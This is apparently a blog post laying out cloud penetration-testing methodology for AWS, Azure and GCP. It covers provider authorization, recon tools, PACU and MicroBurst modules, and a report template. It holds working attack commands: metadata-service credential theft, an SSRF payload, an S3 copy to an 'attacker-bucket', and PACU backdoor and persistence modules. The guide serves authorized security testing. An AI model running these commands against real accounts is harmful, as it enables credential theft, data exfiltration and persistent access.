Cloud Penetration Testing: Methodology for AWS, Azure, and GCP
A technical methodology for cloud penetration testing — authorization requirements, using PACU, ScoutSuite, and Prowler, common attack paths, and how to report findings effectively.
Cloud penetration testing differs from traditional network pentesting in important ways. There are no hosts to scan with nmap, no binaries to reverse engineer, and no network perimeter to breach. The attack surface is the API — a vast, well-documented collection of hundreds of services, each with its own permission model and potential for misconfiguration.
This post covers the methodology, tooling, and authorization requirements for cloud penetration testing.
Authorization: What You Need Before Starting
Unlike traditional pentesting where you test systems you own, cloud penetration testing has specific authorization requirements from the cloud provider in addition to your customer.
AWS
AWS does not require pre-authorization for security testing against your own AWS resources. The AWS Customer Support Policy for Penetration Testing explicitly permits:
- EC2 instances (all types)
- NAT Gateways, Elastic Load Balancers
- RDS, CloudFront, API Gateway, Lambda, Lightsail
- Elastic Beanstalk, S3, Aurora
Prohibited activities:
- DNS zone walking of Route53 hosted zones
- DoS/DDoS testing
- Port flooding, protocol flooding, request flooding
- Testing resources you don't own
No prior approval is needed for permitted activities, but you should notify AWS if you're conducting large-scale testing.
Azure
Azure also allows penetration testing on your own resources without prior approval for most activities. Submit the Penetration Testing Rules of Engagement form and wait for acknowledgment before testing. Azure prohibits:
- DoS/DDoS attacks
- Testing Azure infrastructure (shared components)
- Physical access testing
GCP
GCP requires you to comply with Google's Acceptable Use Policy. No special approval is needed for testing your own GCP projects, but notify Google before large-scale testing.
Key Authorization Document Requirements
When conducting a cloud pentest for a customer, ensure you have:
- Scope document listing all account IDs, project IDs, and subscription IDs in scope
- Authorization letter signed by someone with authority to authorize the test
- Emergency contact who can halt the test if business impact occurs
- Out-of-scope exclusions — shared infrastructure, partner accounts, production vs. staging
Reconnaissance Phase
IAM Enumeration Without Authentication
Some cloud metadata is publicly accessible. For AWS:
# Enumerate S3 buckets from subdomain patterns
# (bucket.s3.amazonaws.com or s3.amazonaws.com/bucket)
curl -s https://target-company.s3.amazonaws.com/ 2>&1 | grep -i "bucket"
# Check for exposed bucket listings
aws s3 ls s3://target-company-backups --no-sign-request 2>/dev/null
# Identify account ID from public S3 bucket (using error messages)
curl "https://s3.amazonaws.com/?x-id=GetObject&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=INVALID"
# Error message may reveal account ID
ScoutSuite: Multi-Cloud Reconnaissance
ScoutSuite performs comprehensive reconnaissance across all cloud services using read-only API access:
pip install scoutsuite
# AWS reconnaissance
scout aws --profile target-account --report-dir ./scoutsuite-report
# Azure reconnaissance
scout azure --cli --report-dir ./scoutsuite-report
# GCP reconnaissance
scout gcp --service-account /path/to/service-account.json \
--project target-project \
--report-dir ./scoutsuite-report
ScoutSuite generates an HTML report with findings organized by service and severity. It checks over 200 rules covering IAM, networking, storage, logging, and more.
Prowler: AWS CIS Benchmark Scanning
Prowler runs over 300 security checks mapped to CIS, PCI-DSS, HIPAA, GDPR, SOC2, and other frameworks:
pip install prowler
# Run all checks
prowler aws --profile target-account
# Run specific framework
prowler aws --compliance cis_level2_aws --profile target-account
# Run checks for specific service
prowler aws --service iam s3 cloudtrail --profile target-account
# Output to OCSF for SIEM ingestion
prowler aws --output-formats ocsf --output-directory ./prowler-output
Post-Reconnaissance: Credential-Based Testing
Once you have valid credentials (obtained through the engagement scope — typically read-only access to start), escalate testing:
Enumerate IAM Permissions Without Triggering Alarms
The most common approach is to call IAM APIs to understand what a user can do:
# Who am I?
aws sts get-caller-identity
# What policies are attached to me?
aws iam list-attached-user-policies --user-name my-user
aws iam list-user-policies --user-name my-user
aws iam list-groups-for-user --user-name my-user
# Get inline and attached policy documents
aws iam get-user-policy --user-name my-user --policy-name inline-policy
aws iam get-policy --policy-arn arn:aws:iam::123456789012:policy/my-policy
aws iam get-policy-version \
--policy-arn arn:aws:iam::123456789012:policy/my-policy \
--version-id v1
A more efficient approach is brute-forcing permissions using enumerate-iam:
git clone https://github.com/andresriancho/enumerate-iam
cd enumerate-iam
python enumerate_iam.py \
--access-key AKIAIOSFODNN7EXAMPLE \
--secret-key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY \
--region us-east-1
This calls each AWS API and records which ones succeed, mapping effective permissions without requiring IAM read access.
PACU: AWS Attack Framework
PACU is the AWS equivalent of Metasploit — a modular framework for AWS attack simulation:
pip install pacu
# Start PACU
pacu
# Set credentials
set_keys # Enter access key, secret key, optional session token
# Run reconnaissance modules
run iam__enum_users_roles_policies_groups
run iam__enum_permissions
run ec2__enum_elastic_ips
run s3__enum
# Check for privilege escalation paths
run iam__privesc_scan
# Common attack modules
run iam__create_backdoor_role # Creates a backdoor role with attacker ARN in trust policy
run ec2__startup_shell_script # Inject shell script via user data
run lambda__backdoor_new_users # Deploy Lambda to backdoor new IAM users
run cloudtrail__download_event_history # Download and analyze CloudTrail
PACU includes over 60 modules covering reconnaissance, privilege escalation, persistence, exfiltration, and lateral movement.
Key Attack Paths to Test
1. Metadata Service Credential Theft
If you have code execution on an EC2 instance (via web app vulnerability or SSH):
# IMDSv1 (no token required)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/MyRole
# IMDSv2 (requires session token)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/iam/security-credentials/MyRole
If IMDSv2 is not enforced, test SSRF via any HTTP request the application makes:
# Test SSRF using blind HTTP request
https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
2. Container Metadata Service
For ECS tasks and Fargate:
# ECS task credential endpoint (different from EC2 IMDS)
curl "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
# Returns temporary credentials for the task role
3. S3 Cross-Account Exfiltration
Test whether data can be exfiltrated to an attacker-controlled account:
# Attempt to copy sensitive object to attacker account S3
aws s3 cp s3://victim-bucket/sensitive-file.csv s3://attacker-bucket/ \
--acl bucket-owner-full-control
This succeeds if the victim bucket doesn't restrict outbound copies and the attacker bucket accepts cross-account uploads.
Azure Attack Tooling
MicroBurst
MicroBurst is an Azure reconnaissance and attack framework:
# Install
Install-Module -Name Az
git clone https://github.com/NetSPI/MicroBurst
# Import
Import-Module .\MicroBurst\MicroBurst.psm1
# Enumerate storage accounts
Invoke-EnumerateAzureBlobs -Base "targetcompany"
# Enumerate key vaults accessible to current identity
Get-AzPasswords
# Find exposed app credentials in App Services
Get-AzWebAppPublishingCredentials -ResourceGroupName "production"
ROADtools for Entra ID
ROADtools is an Entra ID reconnaissance framework:
pip install roadrecon
# Authenticate
roadrecon auth --device-code
# Gather data
roadrecon gather
# Launch web GUI
roadrecon gui
ROADtools builds a local database of all Entra ID objects — users, groups, applications, service principals, conditional access policies — allowing graph-based analysis of attack paths.
Reporting Findings
Cloud pentest findings require a different reporting structure than traditional pentests because the audience includes DevOps engineers and cloud architects who may not be familiar with offensive security terminology.
Finding Template
### [SEVERITY] Publicly Accessible S3 Bucket Contains Customer PII
**Risk**: Critical
**CVSS**: 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
**Affected Resource**: arn:aws:s3:::target-company-customer-exports
**Description**
The S3 bucket `target-company-customer-exports` has Block Public Access
disabled and a bucket policy granting `s3:GetObject` to `*`. The bucket
contains customer export files including names, email addresses, and
hashed passwords for approximately 2.3M customers.
**Evidence**
$ aws s3 ls s3://target-company-customer-exports --no-sign-request
2025-01-15 03:42:11 1,847,392 customer_export_2025_01_15.csv
$ aws s3 cp s3://target-company-customer-exports/customer_export_2025_01_15.csv . --no-sign-request
download: s3://target-company-customer-exports/customer_export_2025_01_15.csv
**Impact**
Unauthenticated access to 2.3M customer records constitutes a GDPR
reportable breach and may trigger regulatory notification requirements.
**Remediation**
1. Enable S3 Block Public Access on the bucket immediately:
aws s3api put-public-access-block --bucket target-company-customer-exports \
--public-access-block-configuration BlockPublicAcls=true,...
2. Remove the public bucket policy
3. Audit all other buckets for similar configurations
4. Enable account-level Block Public Access to prevent recurrence
**References**
- CIS AWS Foundations Benchmark 2.1.5
- AWS Documentation: Blocking public access to S3 storage
Scope Limitations and Responsible Disclosure
Cloud penetration testing has specific scope considerations that don't exist in traditional testing:
- Never test shared infrastructure (AWS Lambda service itself, Azure's Fabric, GCP's control plane)
- Don't delete or modify data unless explicitly authorized (even within scope)
- Stop and notify the customer immediately if you find evidence of an existing breach
- Don't exfiltrate real customer data — document access, capture metadata, then stop
- Test in lower environments (staging) before production unless specifically required
Cloud pentesting findings should be tracked and remediated using the same ticket system as software vulnerabilities. Track mean time to remediate (MTTR) by severity: critical findings should be remediated within 24 hours, high within 7 days, medium within 30 days.